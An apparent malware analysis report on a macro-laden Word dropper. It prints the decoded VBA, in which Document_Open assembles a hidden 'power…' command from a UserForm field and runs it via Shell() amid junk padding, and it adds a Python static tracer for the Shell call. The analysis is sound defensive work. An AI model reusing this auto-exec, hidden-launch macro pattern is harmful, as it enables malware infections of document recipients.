Verdict: MALICIOUS (risk score 182)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
This OOXML document carries a VBA project whose Document_Open handler fires as soon as the file is opened with macros enabled and calls into a chain of obfuscated procedures spread across four modules. The command line is assembled at runtime: the literal "pow" is concatenated with "er" and with a string read from a TextBox (fMain.txt.Text) on an embedded UserForm, and the result is handed to Shell() with window style 0 (vbHide), so the child process starts without a visible window. The "power" prefix and the hidden-window launch are consistent with a PowerShell one-liner that fetches and runs a second-stage payload, but the remainder of the command is stored in the UserForm's streams inside vbaProject.bin rather than in the VBA source, so the exact command, any download URL and the payload itself cannot be read from the extracted macro text alone. The ClamAV signature Doc.Dropper.Agent-7144187-0 corroborates the dropper classification. The dozens of Dim/Sgn/Fix/Round assignments surrounding the real logic are never used; they are padding intended to bloat the modules and disturb signature matching.
Heuristics (5)
- CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Doc.Dropper.Agent-7144187-0
- OOXML_VBA (medium, 2 related findings): Document contains a VBA project; VBA macros present
- OLE_VBA_SHELL (critical): Shell() call in VBA
- OLE_VBA_DOCOPEN (high): Document_Open macro
- EMBEDDED_URL (info): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URLs extracted (all 20 found in document text, OOXML body / shared strings):
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
- http://schemas.microsoft.com/office/drawing/2014/chartex
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
- http://schemas.openxmlformats.org/markup-compatibility/2006
- http://schemas.openxmlformats.org/officeDocument/2006/relationships
- http://schemas.openxmlformats.org/officeDocument/2006/math
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
- http://schemas.openxmlformats.org/wordprocessingml/2006/main
- http://schemas.microsoft.com/office/word/2010/wordml
- http://schemas.microsoft.com/office/word/2012/wordml
- http://schemas.microsoft.com/office/word/2015/wordml/symex
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
- http://schemas.microsoft.com/office/word/2010/wordprocessingInk
- http://schemas.microsoft.com/office/word/2006/wordml
- http://schemas.microsoft.com/office/word/2010/wordprocessingShape
- http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://ns.adobe.com/xap/1.0/
- http://ns.adobe.com/xap/1.0/mm/
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#

None of these is a network indicator: every entry is an XML namespace URI, either from the OOXML, WordprocessingML and DrawingML schemas that any Word document declares, or from the RDF/Adobe XMP vocabularies that usually arrive with the metadata of an embedded image. No URL was reached from the macro itself; the command line that Shell() receives is built at runtime and is not present as a string in the extracted VBA.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1966 bytes | 5f35caaeb73df94f348da9a6f60415fbab22c843dae0d508b0e60f7a77cddd8d |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 23040 bytes | fdec61fffeb6fcd173d9818a4fcd8c9353eeff91310ad133f3288568ce5a8f84 |

Preview of macros.bas (first 1,000 lines of the extracted script). olevba concatenates the decompressed source of every module, so each Attribute VB_Name line marks the start of a new module; the comments were added to mark the lines that matter.

```vb
' Module ThisDocument: auto-exec entry point. Runs when the document is opened
' with macros enabled and does nothing but call fub in module S2g38TxJ.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
fub
End Sub

' Module S2g38TxJ: builds the command line. Every Dim/assignment before
' TKjBL8f is dead padding; only TKjBL8f and the final call are live code.
Attribute VB_Name = "S2g38TxJ"
Sub fub()
Dim f1ahsnFLO As Double
f1ahsnFLO = 59593.250935206
Dim hm7IJ As Single
hm7IJ = 225.53182778669
Dim mkhdY As Double
mkhdY = Fix(57362.510041501)
Dim W23e4aXC As Long
W23e4aXC = Sgn(-29710666)
Dim EQ9r7UMWt As Integer
EQ9r7UMWt = Sgn(-30480)
Dim XsIWga As Boolean
XsIWga = True
Dim QV6UQI As Double
QV6UQI = Fix(54260.339183907)
TKjBL8f = "pow"
' "pow" + "er" + the string returned by hRnP6.SLOR9 (read from the UserForm),
' passed to the Shell wrapper with window style 0 (vbHide): no visible window.
oz5Se7.G8nUYfE7H TKjBL8f + "er" + SLOR9, 0
End Sub

' Module oz5Se7: thin wrapper around Shell(), again surrounded by junk so that
' the Shell call does not sit next to the string that builds its argument.
Attribute VB_Name = "oz5Se7"
Public Sub G8nUYfE7H(PHxupBWF As String, PP8bsXGJT As Integer)
Dim E63CcL As Single
E63CcL = Sgn(44077.868914691)
Dim MKE2VOCJn As Double
MKE2VOCJn = Fix(27827.39536875)
Dim HwU5eicCu As Single
HwU5eicCu = Sgn(35222.491041379)
Dim tjYeu As Single
tjYeu = Round(54436.23668168)
Dim Ep7W4uYIx As Boolean
Ep7W4uYIx = False
Dim LoNYKv As Single
LoNYKv = 32268.717673186
Dim eRnEIt As Boolean
eRnEIt = True
Shell PHxupBWF, PP8bsXGJT   ' executes the assembled command line
Dim Nu6YO As Integer
Nu6YO = Sgn(17043)
Dim Mj0gd As Integer
Mj0gd = Sgn(21209)
End Sub

' Module hRnP6: supplies the rest of the command. dsOUC instantiates the
' UserForm fMain and reads the Text property of its TextBox named txt. The
' TextBox value is stored in the form's streams inside vbaProject.bin, not in
' this VBA source, which is why the command body is absent from the preview.
Attribute VB_Name = "hRnP6"
Private Function dsOUC()
Dim YVIuH7T As Object
Set YVIuH7T = New fMain
Dim Th9LZvRb As String
Th9LZvRb = YVIuH7T.txt.Text
dsOUC = Th9LZvRb
End Function
Public Function SLOR9()
'
SLOR9 = dsOUC
End Function

' UserForm fMain: only the form's code-behind attributes are extracted here;
' its control values (including txt.Text) are not part of the VBA source.
Attribute VB_Name = "fMain"
Attribute VB_Base = "0{675E5D5B-71DD-4218-BB00-43E3E8BA7771}{6BBB73A9-F588-43C6-A000-E4459C08AD51}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```
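As an added example (not code from the analyzer or from the sample), the following Python script performs mechanically the trace a reviewer does by hand on the macro above: it indexes the procedures olevba printed, finds the Shell call, binds the wrapper's parameters from its caller, and resolves the concatenation into literal pieces versus values that only exist at runtime. The VBA it parses is a trimmed copy of the preview (constructed input with the junk assignments removed). The piece that comes from fMain.txt.Text is reported as an unresolved object read, because the UserForm's stored text is not on this page and a static pass should not guess it. The parser handles only the simple constructs this sample uses (string literals, `+`/`&` concatenation, local assignments, Function return values, `Set x = New Form` followed by a member read); anything else is labelled unknown.

```python
"""Added example (not the analyzer's code): trace the Shell() call in the macro
above back to the expression that builds its command line, labelling each piece
as a literal or as a value that only exists at runtime (the UserForm TextBox)."""
import itertools
import re

# Constructed input: the lines of the extracted macro that matter, junk removed.
SAMPLE_VBA = r'''
Sub fub()
TKjBL8f = "pow"
oz5Se7.G8nUYfE7H TKjBL8f + "er" + SLOR9, 0
End Sub
Public Sub G8nUYfE7H(PHxupBWF As String, PP8bsXGJT As Integer)
Shell PHxupBWF, PP8bsXGJT
End Sub
Private Function dsOUC()
Set YVIuH7T = New fMain
Th9LZvRb = YVIuH7T.txt.Text
dsOUC = Th9LZvRb
End Function
Public Function SLOR9()
SLOR9 = dsOUC
End Function
'''

PROC_RE = re.compile(r'^(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(([^)]*)\)', re.I)
END_RE = re.compile(r'^End\s+(?:Sub|Function)\b', re.I)
SHELL_RE = re.compile(r'^(?:Call\s+)?Shell\b\s*\(?\s*(.+?)(?:\s*,\s*(\w+))?\s*\)?$', re.I)


def parse_procs(src):
    """Map procedure name -> (parameter names, body lines) across all modules."""
    procs, cur = {}, None
    for line in map(str.strip, src.splitlines()):
        m = PROC_RE.match(line)
        if m:
            cur = m.group(1)
            procs[cur] = ([p.split()[0] for p in m.group(2).split(',') if p.strip()], [])
        elif END_RE.match(line):
            cur = None
        elif cur:
            procs[cur][1].append(line)
    return procs


def last_assignment(body, name):
    """Last `name = expr` (or `Set name = New X`) in a body, else None."""
    pat = re.compile(r'^(?:Set\s+)?' + re.escape(name) + r'\s*=\s*(.+)$', re.I)
    hits = [m.group(1).strip() for m in map(pat.match, body) if m]
    return hits[-1] if hits else None


def split_args(s):
    """Split a VBA argument list on commas that are outside string literals."""
    return [a.strip() for a in re.findall(r'(?:[^,"]|"[^"]*")+', s)]


def resolve(expr, proc, procs, env=None, depth=0):
    """Resolve a string expression inside `proc` into (kind, value) parts, where
    kind is 'lit', 'object' (a member read at runtime) or 'unknown'."""
    env, body, parts = env or {}, procs[proc][1], []
    if depth > 20:                                              # guard against x = x + "a"
        return [('unknown', expr)]
    for tok in re.split(r'\s*[+&]\s*', expr.strip()):          # VBA concatenation operators
        if re.fullmatch(r'"[^"]*"', tok):
            parts.append(('lit', tok[1:-1]))
        elif re.fullmatch(r'-?\d+(?:\.\d+)?', tok):
            parts.append(('lit', tok))
        elif tok in env:                                        # parameter bound by the caller
            parts.extend(env[tok])
        elif tok in procs:                                      # Function call: follow its return value
            ret = last_assignment(procs[tok][1], tok)
            parts.extend(resolve(ret, tok, procs, None, depth + 1) if ret else [('unknown', tok)])
        elif '.' in tok:                                        # e.g. YVIuH7T.txt.Text
            base, member = tok.split('.', 1)
            obj = re.sub(r'^New\s+', '', last_assignment(body, base) or base, flags=re.I)
            parts.append(('object', f'{obj}.{member}'))
        else:                                                   # local variable
            asg = last_assignment(body, tok)
            parts.extend(resolve(asg, proc, procs, env, depth + 1) if asg else [('unknown', tok)])
    return parts


def trace_shell(procs):
    """For each Shell call, bind the callee's parameters from every caller and
    resolve the command line and window style that reach Shell."""
    hits = []
    for callee, (params, body) in procs.items():
        for m in filter(None, map(SHELL_RE.match, body)):
            call_re = re.compile(r'^(?:Call\s+)?(?:\w+\.)?' + re.escape(callee) + r'\s+(.+)$', re.I)
            bindings = [(caller, dict(zip(params, split_args(cm.group(1)))))
                        for caller, (_, cb) in procs.items()
                        for cm in filter(None, map(call_re.match, cb))] or [(None, {})]
            for caller, argmap in bindings:
                env = {p: resolve(a, caller, procs) for p, a in argmap.items()}
                style = resolve(m.group(2), callee, procs, env) if m.group(2) else [('unknown', 'omitted')]
                hits.append({'caller': caller, 'callee': callee, 'window_style': style,
                             'command': resolve(m.group(1), callee, procs, env)})
    return hits


def known_prefix(parts):
    """Literal text at the start of the command, before the first runtime-only piece."""
    return ''.join(v for _, v in itertools.takewhile(lambda p: p[0] == 'lit', parts))


if __name__ == '__main__':
    for hit in trace_shell(parse_procs(SAMPLE_VBA)):
        print(f"{hit['caller']} -> {hit['callee']} -> Shell, windowstyle {hit['window_style']} (0 = vbHide)")
        print('  command parts:', hit['command'], '| known prefix:', known_prefix(hit['command']))
```

Run against the sample this reports one Shell site, reached from fub through G8nUYfE7H, with the command resolved to the literal prefix "power" followed by an object read of fMain.txt.Text and a window style of 0. Recovering the remainder means parsing the UserForm's stream in vbaProject.bin (olevba's `--decode`/form-extraction output or olefile), which is the next step for this artifact; the static trace only tells you where to look and that the process will run hidden.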